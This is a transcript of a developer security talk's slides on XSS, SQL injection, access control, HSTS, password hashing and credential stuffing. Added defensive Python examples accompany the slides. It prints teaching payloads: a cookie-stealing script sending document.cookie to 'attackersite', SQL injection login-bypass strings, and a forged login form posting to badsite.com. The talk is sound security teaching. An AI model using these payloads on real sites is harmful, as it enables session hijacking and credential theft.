devbeat conference - developer first security
DESCRIPTION
Topics include:
- Sample and Demo of Top Application Risks: Cross Site Scripting, SQL Injection, Access Control
- Who's Monitoring Your Traffic? Encrypting in Transit
- Secure Data Storage & Protection: Correct Password Storage & Data Protection
- Growing Threats Plaguing Applications
TRANSCRIPT
![Page 1: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/1.jpg)
Developer-first security: Integrating Security into Development
Michael Coates
[email protected] | michael-coates.blogspot.com
@_mwc
![Page 3: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/3.jpg)
Reality
![Page 4: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/4.jpg)
"The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine"
http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
![Page 5: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/5.jpg)
Data Loss & Breaches
Sources: Verizon Data Breach Report 2013, datalossdb.org
![Page 6: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/6.jpg)
Outside Attackers
Sources: Verizon Data Breach Report 2013, datalossdb.org
![Page 7: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/7.jpg)
Security - Into The Details
• Sample and Demo of Top Application Risks: Cross Site Scripting, SQL Injection, Access Control
• Who's Monitoring Your Traffic? Encrypting in Transit
• Secure Data Storage & Protection: Correct Password Storage & Data Protection
• Growing Threats Plaguing Applications
![Page 8: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/8.jpg)
WARNING
Security Testing is
ILLEGAL ON UNAUTHORIZED SYSTEMS
![Page 9: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/9.jpg)
3 Dangerous Vulnerabilities
Cross Site Scripting, SQL Injection, Access Control
![Page 10: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/10.jpg)
What are Web Requests
• Open console & enter the following:
telnet google.com 80
GET / HTTP/1.1
• Hit return 2 times
![Page 11: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/11.jpg)
Cross Site Scripting (XSS)
• Problem: User controlled data returned in HTTP response contains HTML/JavaScript code
• Impact: Session Hijacking, Full Control of Page, Malicious Redirects
• Basic XSS Test: "><script>alert(document.cookie)</script>
• Cookie Theft Example: "><script>document.location='http://attackersite/'+document.cookie</script>
![Page 12: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/12.jpg)
XSS Behind The Scenes
Request: http://shinypage.com?user=Bob
JSP Code: <h1>Glad to see you <%= request.getParameter("name") %></h1>
HTML Source (Rendered HTML): <div>Glad to see you <b>Bob</b></div>
![Page 13: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/13.jpg)
XSS Behind The Scenes
http://shinypage.com?user=friend</b><br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
![Page 14: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/14.jpg)
XSS - Injecting HTML
Rendered HTML
![Page 15: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/15.jpg)
Cross Site Scripting
• Cross Site Scripting typically uses JavaScript to do bad things
• Steal session cookies: <script>alert(document.cookie)</script>
• Redirect to bad pages: <script>window.location = "http://evilsite.com/"</script>
• Rewrite page on the fly
![Page 16: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/16.jpg)
Lab! - Reflected XSS
![Page 17: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/17.jpg)
Reflected XSS Lab
• Lesson: Cross-Site Scripting -> Reflected XSS Attacks
• Proxy Not Needed
![Page 18: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/18.jpg)
Lab! - Stored XSS
![Page 19: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/19.jpg)
Stored XSS Lab
• Lesson: Cross-Site Scripting -> Stored XSS Attacks
• Proxy Not Needed
![Page 20: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/20.jpg)
XSS Prevention
• Solution:
1. Output Encoding - converts command characters to benign characters for display
2. Input Validation
HTML Encoding:
  <  ->  &lt;
  >  ->  &gt;
  "  ->  &quot;
  '  ->  &#x27;
  &  ->  &amp;
<h1>Glad to see you <%= encodeForHTML( request.getParameter("name") ) %></h1>
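The encoding table above as runnable code, added here as an example and not taken from the deck: Python stands in for the JSP, `encode_for_html` plays the role of `encodeForHTML`, and the forged-login-form payload from the earlier slide is embedded as a constructed input so the unsafe and safe renderings can be compared side by side.

```python
# Added example (not the deck's code): the slide's HTML-encoding table as a function,
# applied to the deck's forged-login-form payload. Python stands in for the JSP shown.
import html

# The five characters the slide lists, with the entities they become on output.
HTML_ENCODE_MAP = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def encode_for_html(value: str) -> str:
    """Encode each structure-changing character; everything else passes through."""
    return "".join(HTML_ENCODE_MAP.get(ch, ch) for ch in value)


def same_as_stdlib(value: str) -> bool:
    """Cross-check against html.escape, which encodes the same five characters."""
    return encode_for_html(value) == html.escape(value, quote=True)


def render_greeting_unsafe(name: str) -> str:
    """Mirrors the vulnerable JSP: the parameter is dropped straight into the page."""
    return f"<h1>Glad to see you {name}</h1>"


def render_greeting_safe(name: str) -> str:
    """Mirrors the fixed JSP: the parameter is encoded before it reaches the page."""
    return f"<h1>Glad to see you {encode_for_html(name)}</h1>"


def injected_markup(rendered: str) -> bool:
    """True if anything between the template's own <h1> tags could open or close a tag."""
    inner = rendered[len("<h1>Glad to see you "):-len("</h1>")]
    return "<" in inner or ">" in inner


# Constructed input: the deck's forged login form payload as one string.
PAYLOAD = (
    'friend</b><br><form method="post" action="badsite.com/login"> '
    'Login: <input type="text" name="username"><br> '
    'Password:<input type="password" name="password">'
    '<input type="submit" value="Submit" /></form>'
)

if __name__ == "__main__":
    print(render_greeting_unsafe(PAYLOAD))  # browser would render a working login form
    print(render_greeting_safe(PAYLOAD))    # browser shows the markup as literal text
```

Output encoding is context-specific: this table is correct for HTML element content and quoted attribute values, which is the context the JSP places the name in; a value dropped into a JavaScript string or a URL needs a different encoder, as the OWASP cheat sheet listed on the next slides explains.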
![Page 21: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/21.jpg)
XSS Attempt Revisited
http://shinypage.com?user=friend</b><br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
![Page 22: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/22.jpg)
Safe Handling
Rendered HTML (the encoded payload is displayed as literal text): Glad to see you friend</b> <br><form method="post" action="badsite.com/login"> Login: <input type="text" name="username"><br> Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
![Page 23: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/23.jpg)
XSS Resources
• OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
• Content Security Policy - http://bit.ly/CSP-OWASP
• OWASP XSS Overview - http://bit.ly/OWASPXSS
![Page 24: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/24.jpg)
SQL Injection
• Problem: User controlled data improperly used with SQL statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests: OR 1=1 -- and ' OR '1'='1'--
• Example Vulnerable Query: sqlQ = "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
![Page 25: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/25.jpg)
Lab! - SQL Lesson
![Page 26: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/26.jpg)
SQL Injection
• Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting "control" characters. Login as "Neville" w/o knowledge of the password
![Page 27: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/27.jpg)
SQL Injection
• HTTP Post: employee_id=112&password=x' OR '1'='1&action=Login
• Vulnerable SQL: "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
• Resulting Statement: Select user from UserTable where name='112' and pass='x' OR '1'='1'
• Result: ... name='112' and pass='x' OR TRUE
![Page 28: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/28.jpg)
SQL Injection
• Parameterized Queries: no confusion with control characters. Example: the query would look for a password of ' or '1'='1
• Input Validation: Are special characters needed for most fields? What about non-printable characters %00-%0A?
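The two fixes from this slide next to the concatenated query from the previous ones, added here as an example rather than code from the deck or the WebGoat lab: Python's sqlite3 module stands in for JDBC, the `UserTable` row is constructed, and the password value is the one the slide's HTTP POST carries. The parameterized version hands the values to the driver separately from the SQL text, so the quote in the password is compared as a character instead of being parsed.

```python
# Added example (not the deck's code): the deck's concatenated login query beside a
# parameterized one, run against an in-memory SQLite table. Python/sqlite3 stands in
# for the JSP/JDBC of the lab; the table and its single row are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """One constructed user: the lab's employee_id 112 with a made-up password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (name TEXT NOT NULL, pass TEXT NOT NULL)")
    conn.execute("INSERT INTO UserTable VALUES ('112', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The slide's query built by string concatenation: user input becomes SQL syntax."""
    sql_q = ("Select name from UserTable where name='" + username
             + "' and pass='" + password + "'")
    return [row[0] for row in conn.execute(sql_q)]


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with placeholders: values travel separately from the SQL text."""
    sql_q = "Select name from UserTable where name=? and pass=?"
    return [row[0] for row in conn.execute(sql_q, (username, password))]


def valid_employee_id(value: str) -> bool:
    """Input validation from the slide: an employee id never needs special characters."""
    return value.isdigit() and 0 < len(value) <= 10


def has_non_printable(value: str) -> bool:
    """Flags the slide's %00-%0A range and the rest of the C0 control characters."""
    return any(ord(ch) < 0x20 for ch in value)


def run_demo() -> dict:
    """Same injected password against both query styles, plus a correct login."""
    db = make_db()
    injected = "x' OR '1'='1"  # the password value from the deck's HTTP POST
    return {
        "concat": login_vulnerable(db, "112", injected),        # ['112']: bypassed
        "param": login_parameterized(db, "112", injected),      # []: rejected
        "param_ok": login_parameterized(db, "112", "correct-horse"),
    }


if __name__ == "__main__":
    for label, rows in run_demo().items():
        print(f"{label:9s}: {rows}")
```

The validation helpers are a second layer, not a replacement: `valid_employee_id` rejects the quote-bearing value outright because that field is numeric, but free-text fields legitimately contain quotes, and for those only the parameterized query keeps the data out of the parser.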
![Page 29: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/29.jpg)
SQL Injection Resources
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
![Page 30: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/30.jpg)
Access Control
• Problem: Developers assume some parts of app can't be seen, tampered with or invoked by the user
• Impact: Unauthorized data access, access to privileged functionality
• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
• Access Control Failure Example:
  • http://somebadbank.com/showacct?id=101
  • http://somebadbank.com/showacct?id=102
![Page 31: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/31.jpg)
Lab! - Access Control
![Page 32: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/32.jpg)
Access Control Violation
• Lesson: Access Control Flaws -> LAB: Role Based Access Control -> Stage 1: Bypass Business Layer Access Control
• Proxy Needed
• Objective: Find way to execute "delete" functionality using Tom's account. Delete account "tom"
![Page 33: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/33.jpg)
Access Control Violation
• Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server
POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
Host: localhost

employee_id=105&action=ViewProfile
![Page 34: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/34.jpg)
Strong Access Controls
• Access Control Performed Server Side
• Never Relies Upon "Security by Obscurity"
• Be Careful with Identifiers (e.g. id=123)
• Attacker Can Send Anything in Request
• Presentation Layer Controls Can Not Enforce Access Control
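Both failures the deck walks through, the bank's `showacct?id=` and the lab's `action=` parameter, share one fix: the server decides from its own session and records, never from what the request claims. The code below is an added example, not the deck's or WebGoat's; the `Session` type, the account table, the role names and the role-to-action table are constructed for the demonstration.

```python
# Added example (not the deck's code): server-side authorization for the two cases the
# deck shows, the bank's showacct?id= and WebGoat's action= parameter. Names, roles,
# accounts and the role-to-action table are all constructed for the demo.
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    user_id: int   # set by the server at login, never taken from the request
    role: str      # "employee" or "admin"


# Constructed data: who owns which account, and which actions each role may invoke.
ACCOUNTS = {101: {"owner": 1, "balance": 500}, 102: {"owner": 2, "balance": 9000}}
ROLE_ACTIONS = {
    "employee": {"SearchStaff", "ViewProfile"},
    "admin": {"SearchStaff", "ViewProfile", "DeleteProfile"},
}


def show_account(session: Session, account_id: int) -> tuple:
    """GET /showacct?id=N: look the record up, then check the caller may see it.
    The identifier is untrusted; ownership comes from the server-side record."""
    acct = ACCOUNTS.get(account_id)
    if acct is None or (session.role != "admin" and acct["owner"] != session.user_id):
        # Same answer for "not yours" and "does not exist", so iterating ids learns nothing.
        return 404, None
    return 200, acct


def perform_action(session: Session, action: str, employee_id: int) -> tuple:
    """POST action=...: the menu the browser shows is presentation; this check decides."""
    if action not in ROLE_ACTIONS.get(session.role, set()):
        return 403, f"{session.role} may not {action}"
    return 200, f"{action} on employee {employee_id}"


if __name__ == "__main__":
    tom = Session(user_id=1, role="employee")
    print(show_account(tom, 101))                   # own account: 200
    print(show_account(tom, 102))                   # someone else's: 404
    print(perform_action(tom, "DeleteProfile", 105))  # not in Tom's role: 403
```

The check sits in the request handler, after lookup and before any data leaves, which is what "performed server side" means in practice; hiding the delete button or the second account id from the page, the presentation-layer control the last bullet warns about, changes nothing in this code path.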
![Page 35: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/35.jpg)
Access Control Resources
• https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
![Page 36: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/36.jpg)
Who’s Monitoring Your Traffic?
![Page 37: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/37.jpg)
Insecure Session Management
• Secure login over HTTPS: https://site.com/login
• Password submitted encrypted
• Immediate redirect to HTTP: http://site.com/profile
• Session ID sent cleartext <-- vulnerability point
![Page 38: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/38.jpg)
Vulnerable Redirects
• User requests HTTP page, response redirects to HTTPS
• 302 Response is HTTP <-- Vulnerability Point
![Page 39: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/39.jpg)
Secure Design for Communication
• Use HTTPS Throughout Web Site
• HTTP Strict Transport Security (HSTS)
  • Opt-in security control
  • Website instructs compatible browser to enable STS for site
• HSTS Forces (for enabled site):
  • All communication over HTTPS
  • No insecure HTTP requests sent from browser
  • No option for user to override untrusted certificates
![Page 40: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/40.jpg)
Strict Transport Security
• Browser prevents HTTP requests to HSTS site
• Any request to site is "upgraded" to HTTPS
• No clear text HTTP traffic ever sent to HSTS site
• Browser assumes HTTPS for HSTS sites
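The three slides above describe one exchange: an HTTP request that the server answers only with a redirect, an HTTPS response that carries the HSTS header and a session cookie that cannot travel in cleartext, and a browser that, once it has seen the header, rewrites later http:// requests before they leave the machine. The code below models that exchange and is an added example, not the deck's; the host name, paths, cookie value and the one-year max-age are constructed.

```python
# Added example (not the deck's code): a server that answers every HTTP request with a
# redirect and sends HSTS plus a Secure session cookie over HTTPS, and a minimal model
# of the browser-side HSTS cache that upgrades later http:// requests before they are
# sent. Host names, paths and the cookie value are constructed.
from urllib.parse import urlsplit, urlunsplit

HSTS_MAX_AGE = 31536000  # one year in seconds (assumed policy value)


def handle_request(scheme: str, host: str, path: str, set_session: bool = False) -> tuple:
    """Return (status, headers). Only an HTTPS request ever gets a body or a cookie."""
    if scheme != "https":
        # The redirect carries no application data, and no cookie is set on this
        # branch, so the cleartext session id of the earlier slide cannot appear here.
        return 301, {"Location": f"https://{host}{path}"}
    headers = {"Strict-Transport-Security": f"max-age={HSTS_MAX_AGE}; includeSubDomains"}
    if set_session:
        # Secure: never sent over HTTP. HttpOnly: not readable via document.cookie.
        headers["Set-Cookie"] = "SESSIONID=constructed-value; Secure; HttpOnly; Path=/"
    return 200, headers


class BrowserHstsCache:
    """Models the browser's HSTS list: once a host is known, http:// never leaves the box."""

    def __init__(self) -> None:
        self.hosts = set()

    def observe(self, host: str, headers: dict) -> None:
        """Learn HSTS from a response (browsers only honour the header over HTTPS)."""
        value = headers.get("Strict-Transport-Security", "")
        for part in value.split(";"):
            part = part.strip()
            if part.startswith("max-age=") and int(part[len("max-age="):]) > 0:
                self.hosts.add(host)

    def upgrade(self, url: str) -> str:
        """Rewrite http:// to https:// for HSTS hosts before any request is sent."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in self.hosts:
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


if __name__ == "__main__":
    cache = BrowserHstsCache()
    print(handle_request("http", "site.com", "/profile"))          # 301 to https://
    status, hdrs = handle_request("https", "site.com", "/login", set_session=True)
    cache.observe("site.com", hdrs)
    print(cache.upgrade("http://site.com/profile"))                 # https://site.com/profile
```

The very first visit still starts over HTTP, which is why the redirect branch must never set or read the session cookie; the `Secure` attribute on the cookie is the belt to HSTS's braces, covering the window before the browser has learned the policy.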
![Page 41: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/41.jpg)
Secure Data Storage & Protection
![Page 42: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/42.jpg)
Password Storage
Bad Approaches:
• Your own algorithm
• md5
• sha1
• encryption
• base64 encoding
• rot 13
Good Approach:
• Bcrypt
• PBKDF2
+ Per User Salt
![Page 43: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/43.jpg)
What Are We Protecting?
Correct password hashing protects against:
• Offline attacks of password repository
• Brute Force, Rainbow Attacks
Does not address:
• Guessing easy passwords
• Password theft, disclosure
• Session Hijacking
• Credential Stuffing
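PBKDF2 with a per-user salt, as the previous two slides recommend, beside the unsalted md5 they list under bad approaches. This is an added example using Python's standard library, not code from the deck; the iteration count and the `algorithm$iterations$salt$hash` storage format are assumptions chosen for the demo.

```python
# Added example (not the deck's code): per-user salted PBKDF2 beside the unsalted md5
# the deck lists as a bad approach. Iteration count and the storage format are
# assumptions, not values from the slides.
import base64
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed; raise it as hardware gets faster
SALT_BYTES = 16


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Fresh random salt per user, stored beside the hash so it can be verified later."""
    salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt_b64, dk_b64 = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    expected = base64.b64decode(dk_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(actual, expected)


def md5_unsalted(password: str) -> str:
    """What the deck warns against: equal passwords give equal, precomputable hashes."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    # Two users who chose the same password (constructed): md5 exposes that, PBKDF2 does not.
    print(md5_unsalted("password1") == md5_unsalted("password1"))   # True
    a, b = hash_password("password1"), hash_password("password1")
    print(a == b, verify_password("password1", a), verify_password("wrong", b))
```

Storing the iteration count with the hash lets the work factor rise over time: old records keep verifying, and can be rehashed at the user's next successful login. None of this changes what the second slide says it does not cover; a correctly hashed "password1" is still guessed in seconds.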
![Page 44: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/44.jpg)
Architecture for Sensitive Data
Diagram: https://site.com -> web server -> internal SSL -> database
Monitor Database Queries & Response Size
![Page 45: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/45.jpg)
Encrypting Sensitive Data in Database
Diagram: the database holds User Data encrypted under a Customer/Group Encryption Key; that key is stored only as Encrypted [Customer/Group Encryption Key], wrapped by a Key Encrypting Key held in a Hardware Security Module, which performs the Encrypt / Decrypt of the data key.
• Encryption within Database
• Unique keys per data region
• Key encrypting keys
• Hardware Security Modules (HSM)
![Page 46: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/46.jpg)
Growing Threats Plaguing Applications
![Page 47: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/47.jpg)
Denial of Service
Denial of Service (DOS)
Distributed Denial of Service (DDOS)
![Page 48: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/48.jpg)
Denial of Service
• Network DDOS: Exhaust Network Bandwidth
• Application Layer DDOS (e.g. site.com/generateReport): Exhaust Server CPU/Memory
![Page 49: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/49.jpg)
Application Denial of Service
Traditional Network DDOS
• overwhelms target with volume
• exhausts bandwidth / capacity of network devices
• Requires large number of machines
• Defenses: CDN, anti-DDOS services
Application DDOS
• invokes computationally intense application functions
• exhausts CPU / memory of web servers
• Requires few machines
• Defenses: Few available, must customize
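One shape the "must customize" defense takes: a per-client budget that charges each request by how expensive the endpoint is, so a handful of `/generateReport` calls exhausts a client's allowance long before they exhaust the server. This is an added example, not the deck's code; the endpoint cost table, capacity and refill rate are constructed and would be measured per application.

```python
# Added example (not the deck's code): a per-client budget that charges each request by
# how expensive the endpoint is, the kind of custom defense the deck says application
# DDoS needs. Endpoint costs, capacity and refill rate are constructed for the demo.
import time


class CostBudget:
    """Token bucket keyed by client: cheap pages barely dent it, /generateReport drains it."""

    def __init__(self, capacity: float, refill_per_sec: float, clock=time.monotonic):
        self.capacity = capacity
        self.refill = refill_per_sec
        self.clock = clock          # injectable so tests can control time
        self.state = {}             # client -> (tokens, last_seen)

    def allow(self, client: str, cost: float) -> bool:
        now = self.clock()
        tokens, last = self.state.get(client, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.refill)
        if tokens < cost:
            self.state[client] = (tokens, now)
            return False            # reject before the expensive work starts
        self.state[client] = (tokens - cost, now)
        return True


# Constructed cost table: relative CPU/memory of each endpoint, measured per application.
ENDPOINT_COST = {"/": 1, "/search": 5, "/generateReport": 20}


def gate(budget: CostBudget, client: str, path: str) -> bool:
    """Call at the top of the request handler; unknown paths are charged the minimum."""
    return budget.allow(client, ENDPOINT_COST.get(path, 1))


if __name__ == "__main__":
    budget = CostBudget(capacity=30, refill_per_sec=1.0)
    for _ in range(3):
        print(gate(budget, "198.51.100.7", "/generateReport"))  # True, False, False
    print(gate(budget, "198.51.100.7", "/"))                     # True: cheap page still served
```

The key for `client` matters as much as the numbers: a source address is the simplest choice but is shared behind NAT and cheap to rotate, so for authenticated endpoints keying on the session or account gives a budget the attacker cannot reset by changing addresses.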
![Page 50: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/50.jpg)
Credential Stuffing
Diagram: a compromised server leaks Stolen Credentials (joe: abc123, sue: password1, bob: MyP0n3y); the attacker replays each pair (joe: abc123, sue: password1, ...) against https://site.com/login, where the same Credentials (joe: abc123, sue: password1, bob: MyP0n3y) were reused.
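The earlier hashing slide notes that correct password storage does not address credential stuffing; what does help is watching the login endpoint for the pattern in the diagram, one source trying many different usernames in quick succession. The detection below is an added example, not the deck's code: the log format, the addresses, the timestamps and the thresholds are all constructed.

```python
# Added example (not the deck's code): detection over constructed login-log lines for the
# pattern the deck's credential-stuffing slide describes, one source trying many
# different usernames. The log format, addresses and thresholds are all made up here.
import re
from collections import defaultdict

# Constructed log: epoch seconds, source IP, username, outcome.
LOG_LINES = """\
1700000000 ip=198.51.100.7 user=alice result=ok
1700000003 ip=203.0.113.9 user=joe result=fail
1700000004 ip=203.0.113.9 user=sue result=fail
1700000005 ip=203.0.113.9 user=bob result=ok
1700000006 ip=203.0.113.9 user=carol result=fail
1700000007 ip=203.0.113.9 user=dave result=fail
1700000010 ip=198.51.100.7 user=alice result=fail
1700000015 ip=198.51.100.7 user=alice result=ok
""".splitlines()

LINE_RE = re.compile(r"^(?P<ts>\d+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


def parse(lines):
    """Yield (timestamp, ip, user, result); lines that do not match are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield int(m["ts"]), m["ip"], m["user"], m["result"]


def stuffing_sources(lines, window_sec: int = 60, min_users: int = 3) -> dict:
    """IPs that attempted at least min_users distinct usernames within window_sec.
    A real user retrying one account does not trigger this; a list replay does."""
    attempts = defaultdict(list)  # ip -> [(ts, user)]
    for ts, ip, user, _ in parse(lines):
        attempts[ip].append((ts, user))
    flagged = {}
    for ip, events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for ts, u in events[i:] if ts - start <= window_sec}
            if len(users) >= min_users:
                flagged[ip] = users
                break
    return flagged


def hits_from_source(lines, ip: str) -> set:
    """Accounts that logged in successfully from a flagged source: likely reused passwords."""
    return {user for _, src, user, result in parse(lines) if src == ip and result == "ok"}


if __name__ == "__main__":
    for ip, users in stuffing_sources(LOG_LINES).items():
        print(ip, "tried", sorted(users), "succeeded on", sorted(hits_from_source(LOG_LINES, ip)))
```

The successes matter more than the failures: `hits_from_source` lists the accounts whose owners reused a leaked password, which is the set that needs a forced reset and a session revocation, not just a blocked address.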
![Page 51: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/51.jpg)
Take Aways
• Understand top security threats and anticipate potential malicious use of application to design secure code
• Multiple controls possible to protect sensitive data in transit and storage
• Understand emerging threats to plan for appropriate defenses
• Use OWASP BWA Security Lab and learn more!
